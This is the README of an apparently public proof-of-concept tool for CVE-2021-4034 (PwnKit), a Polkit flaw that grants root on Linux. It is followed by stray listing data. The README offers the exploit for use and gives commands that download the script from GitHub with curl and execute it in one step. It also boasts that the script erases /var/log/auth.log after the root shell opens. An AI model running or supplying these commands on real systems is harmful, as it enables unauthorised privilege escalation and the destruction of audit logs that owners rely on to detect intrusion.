██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz
Intro
This is a simple PoC for the newly found Polkit error names PwnKit.
I made it both as bash and python3 script - just for the fun of it.
The issue is very simple to abuse but has huge consequences as it will easily give root access on most Linux machines where the attacker has local user access.
How to run
This scripts are a one shot execution so simply do
python3 pkwner.py
or
bash pkwner.sh
You can also run it directly from a webserver (e.g. this github repo) via:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
or
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
In both cases it should look something like this: 
and 
The script will create some files and folders but will cleanup after itself when the root shell is popped - it will even clean up the /var/log/auth.log (because why not).
Credits
- Qualys for finding the issue and making the info public
- Andris Raugulis for making one of the first PoCs to get inspired from
- MiscGang because misgang@Kalmarunionen are baddass
1 Dec 03, 2021
43 Dec 23, 2022
27 Dec 06, 2022
2 Dec 02, 2022
161 Jan 02, 2023
0 Jan 10, 2022
164 Dec 10, 2022
1 Dec 29, 2021
588 Jan 09, 2023
16 Dec 08, 2022
17 Nov 09, 2022
1 Feb 07, 2022
35 Dec 12, 2022
22 Jul 25, 2022
307 Dec 24, 2022
14 Jun 24, 2022
7 Nov 09, 2022
2 Oct 29, 2022
63 Dec 30, 2022
2 Nov 16, 2021